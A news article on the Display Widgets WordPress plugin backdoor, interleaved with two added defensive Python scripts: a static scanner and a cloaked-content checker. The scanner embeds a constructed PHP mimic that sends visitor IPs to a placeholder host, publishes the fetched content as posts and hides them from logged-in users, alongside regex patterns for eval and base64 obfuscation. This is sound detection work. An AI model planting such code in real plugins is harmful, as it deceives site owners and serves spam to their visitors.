Malicious WordPress plugin installed backdoor on thousands of websites

Widget plugin spewed spam to unsuspecting victims

Hackers have used a WordPress plugin to install backdoors on up to 200,000 websites, allowing spam to be uploaded onto unsuspecting websites.

According to research carried out by IT security firm WordFence, the plugin, known as Display Widgets, should be removed immediately by website owners. The firm said that the last three releases of the plugin have contained code that allows the author to publish any content on an affected site.


"The authors of this plugin have been using the backdoor to publish spam content to sites running their plugin. During the past three months the plugin has been removed and readmitted to the WordPress.org plugin repository a total of four times," said Mark Maunder, CEO of WordFence. 

Maunder said that the plugin was developed by its original author as an open-source plugin but was then sold on 21 June. An updated version, 2.6.0, was released by its new owner immediately. WordFence was informed by David Law, a UK-based SEO consultant, that the widget had begun installing additional code and was then downloading data on Law's server.

On 23 June, WordFence removed Display Widget, and a week later, the new owner released version 2.6.1 of the plugin. This release contained a file called geolocation.php which, no one realised at the time, contained malicious code. This code allowed the plugin author to post new content to any website running the plugin, to a URL of their choosing. 
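The behaviour described here, a plugin file that fetches content from an outside server, publishes it as posts and keeps it out of sight of logged-in users, can be triaged statically before anyone reads the code line by line. The script below is an added example written for this page; it is not WordFence's tooling and not the plugin's own code. The PHP snippets it scans are constructed stand-ins that only illustrate the pattern the article describes and are not the real geolocation.php; the domain `example.invalid` is a placeholder.

```python
"""Static triage of WordPress plugin source files for the combination of
behaviours the article describes: remote content fetching, post insertion,
visitor logging and hiding content from logged-in users.
Added example; the PHP below is constructed, not the Display Widgets code."""
import re

# Each indicator is (name, regex). Individually these calls are legitimate in
# many plugins; it is the combination that merits a manual look.
INDICATORS = [
    ("remote_fetch",    re.compile(r"\b(wp_remote_(get|post|request)|curl_init|file_get_contents)\s*\(", re.I)),
    ("external_url",    re.compile(r"https?://(?!(www\.)?wordpress\.org/)[\w.-]+", re.I)),
    ("posts_content",   re.compile(r"\b(wp_insert_post|wp_update_post)\s*\(")),
    ("login_cloaking",  re.compile(r"\bis_user_logged_in\s*\(")),
    ("dynamic_code",    re.compile(r"\b(eval|base64_decode|gzinflate|str_rot13|create_function)\s*\(", re.I)),
    ("visitor_logging", re.compile(r"\$_SERVER\[\s*['\"](REMOTE_ADDR|HTTP_USER_AGENT)['\"]\s*\]")),
]

# Pairs of indicators that together describe the article's backdoor behaviour.
HIGH_RISK_COMBOS = [
    {"remote_fetch", "posts_content"},    # pulls content from outside and publishes it
    {"posts_content", "login_cloaking"},  # publishes content that admins may not see
    {"remote_fetch", "dynamic_code"},     # executes what it downloads
]


def scan_source(source: str) -> set:
    """Return the set of indicator names that fire on one PHP source file."""
    return {name for name, rx in INDICATORS if rx.search(source)}


def triage_plugin(files: dict) -> dict:
    """Map each plugin file path to the indicators found in it."""
    return {path: scan_source(src) for path, src in files.items()}


def flagged_files(files: dict) -> dict:
    """Return only the files whose indicators match a high-risk combination."""
    return {path: hits for path, hits in triage_plugin(files).items()
            if any(combo <= hits for combo in HIGH_RISK_COMBOS)}


# Constructed sample plugin: one benign widget-filter file and one file that
# mimics the behaviour the article describes (NOT the real geolocation.php).
SAMPLE_PLUGIN = {
    "display-widgets/display-widgets.php": """<?php
/* Constructed benign stub: hides a widget on the front page. */
add_filter('widget_display_callback', 'dw_filter_widget', 10, 3);
function dw_filter_widget($instance, $widget, $args) {
    if (!empty($instance['dw_hide_on_home']) && is_front_page()) { return false; }
    return $instance;
}
""",
    "display-widgets/geolocation.php": """<?php
// Constructed illustration of the described behaviour, not the real file.
function dw_geo_sync() {
    $resp = wp_remote_get('http://example.invalid/feed?ip=' . $_SERVER['REMOTE_ADDR']);
    if (is_wp_error($resp)) { return; }
    foreach (json_decode(wp_remote_retrieve_body($resp), true) as $item) {
        wp_insert_post(array('post_title' => $item['t'], 'post_content' => $item['c'],
                             'post_status' => 'publish', 'meta_input' => array('_dw_geo' => 1)));
    }
}
add_filter('the_posts', function ($posts) {
    if (is_user_logged_in()) {
        return array_filter($posts, fn($p) => !get_post_meta($p->ID, '_dw_geo', true));
    }
    return $posts;
});
""",
}

if __name__ == "__main__":
    for path, hits in flagged_files(SAMPLE_PLUGIN).items():
        print(f"{path}: {', '.join(sorted(hits))}")
```

To run it against a real installation, read each file under `wp-content/plugins/<plugin>/` into the dictionary instead of `SAMPLE_PLUGIN`; a file that trips a high-risk combination is a candidate for manual review, not proof of malice.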


"Furthermore, the malicious code prevented any logged-in user from seeing the content. In other words, site owners would not see the malicious content. David Law again contacted the plugin team and let them know that the plugin is logging visits to each website to an external server, which has privacy implications," said Maunder.

On 1 July, the plugin was pulled from the WordPress repository, only for version 2.6.2 to follow on 6 July. Again, it included the malicious code referenced above, which had still gone unnoticed.

It was on 23 July that a user by the name of Calvin Ngan opened a Trac ticket reporting that Display Widgets was injecting spammy content into his website. He included a link to Google results that had indexed the spam and said the malicious code was in geolocation.php.
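The two details above, content hidden from logged-in users yet indexed by Google, suggest a self-check any site owner can run: render a page as an anonymous visitor and again as a logged-in user, then diff the two. The script below is an added example, not from the article or WordFence; the pair of HTML documents it compares is constructed, and `fetch_view` is a helper for obtaining the two renderings from a live site (the session cookie name and value are whatever your own login produced).

```python
"""Detect content that a site shows to anonymous visitors (and therefore to
search-engine crawlers) but withholds from logged-in users.
Added example; the two HTML views below are constructed."""
from html.parser import HTMLParser
import urllib.request


class _Collector(HTMLParser):
    """Collect link targets and the normalised text of block-level elements."""
    BLOCK_TAGS = {"p", "div", "li", "h1", "h2", "h3", "article", "section"}

    def __init__(self):
        super().__init__()
        self.links = set()
        self.blocks = set()
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            href = dict(attrs).get("href")
            if href:
                self.links.add(href)
        if tag in self.BLOCK_TAGS:
            self._flush()

    def handle_endtag(self, tag):
        if tag in self.BLOCK_TAGS:
            self._flush()

    def handle_data(self, data):
        self._buf.append(data)

    def _flush(self):
        # Collapse whitespace so layout differences do not produce false diffs.
        text = " ".join(" ".join(self._buf).split())
        if text:
            self.blocks.add(text)
        self._buf = []

    def close(self):
        super().close()
        self._flush()


def extract(html: str):
    """Return (links, text_blocks) for one rendering of a page."""
    c = _Collector()
    c.feed(html)
    c.close()
    return c.links, c.blocks


def cloaked_content(anonymous_html: str, logged_in_html: str) -> dict:
    """Links and text blocks present only in the anonymous rendering."""
    anon_links, anon_blocks = extract(anonymous_html)
    auth_links, auth_blocks = extract(logged_in_html)
    return {"links": anon_links - auth_links, "text": anon_blocks - auth_blocks}


def fetch_view(url: str, cookie: str = "") -> str:
    """Fetch one rendering of a page; pass your own session cookie for the
    logged-in view. Not used by the offline demo below."""
    req = urllib.request.Request(url, headers={"User-Agent": "site-self-check/1.0"})
    if cookie:
        req.add_header("Cookie", cookie)
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read().decode(resp.headers.get_content_charset() or "utf-8")


# Constructed renderings of the same page; the second lacks the injected block.
ANONYMOUS_VIEW = """<html><body>
<h1>Shop blog</h1>
<p>Our regular post about widgets.</p>
<div class="dw-geo"><p>Cheap pills <a href="http://spam.example.invalid/buy">buy now</a></p></div>
<p><a href="/about">About us</a></p>
</body></html>"""

LOGGED_IN_VIEW = """<html><body>
<h1>Shop blog</h1>
<p>Our regular post about widgets.</p>
<p><a href="/about">About us</a></p>
</body></html>"""

if __name__ == "__main__":
    diff = cloaked_content(ANONYMOUS_VIEW, LOGGED_IN_VIEW)
    print("anonymous-only links:", sorted(diff["links"]))
    print("anonymous-only text:", sorted(diff["text"]))
```

Run the comparison on a few representative URLs (home page, a post, a category page) rather than one; cloaked content is often injected on only some templates, and a non-empty result for any of them is the cue to inspect the active plugins.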

In September, version 2.6.3 of the plugin was released, and it included the same malicious code. Last week, a user on the Display Widgets plugin support forum on WordPress.org reported that spam had been injected into their website.


"The authors of the plugin are actively maintaining their malicious code, switching between sources for spam and working to obfuscate (hide) the domain they are fetching spam from," said Maunder.

The widget was removed permanently on 8 September, but Maunder tracked down the plugin's new buyer to a service called WP Devs, which buys old and abandoned plugins.

His investigations found that the company appears to be run by one person in the US and possibly another in Eastern Europe, judging by linguistic errors made by the poster.

Maunder said that people in the WordPress community should not "start any witch hunts". 

"Occasionally plugins change ownership and very rarely, that doesn't go well. That appears to be what happened in this case," he said.
